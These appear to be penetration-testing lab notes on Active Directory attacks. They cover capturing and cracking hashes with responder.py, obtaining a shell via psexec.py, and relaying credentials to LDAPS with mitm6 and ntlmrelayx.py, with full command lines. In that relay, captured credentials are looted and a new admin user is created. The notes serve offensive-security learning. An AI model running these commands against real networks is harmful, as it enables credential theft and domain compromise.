Attack Vectors

The following method requires user interaction (for example, from an RDP session).

  1. Run responder.py to listen for activity.

  2. Obtain hashes and crack them.

  3. Gain a shell via psexec.py.

  • Syntax -> psexec.py DOMAIN.local/username:PASSWORD@IP_ADDRESS

Attacking LDAP Secure with mitm6!

  1. Download mitm6 and install it with pip3 (pip3 install .).

  2. Set up LDAPS on the Windows server.

  • Server -> Manage -> Add Roles and Features -> add Active Directory Certificate Services -> configure AD CS (restart option enabled) -> click CA -> restart the machine

  3. python3 mitm6.py -d marvel.local (in the opt folder) -> this starts listening for connections

  4. ntlmrelayx.py -6 -t ldaps://DOMAINCONTROLLER_IP -wh fakewpad.marvel.local -l lootme

  5. A user restarts a computer -> all the creds will be stored in a folder called "lootme"

If you look at it in Firefox, you can see all kinds of secrets!

Once a user logs in as admin, it creates a new user with admin privileges.
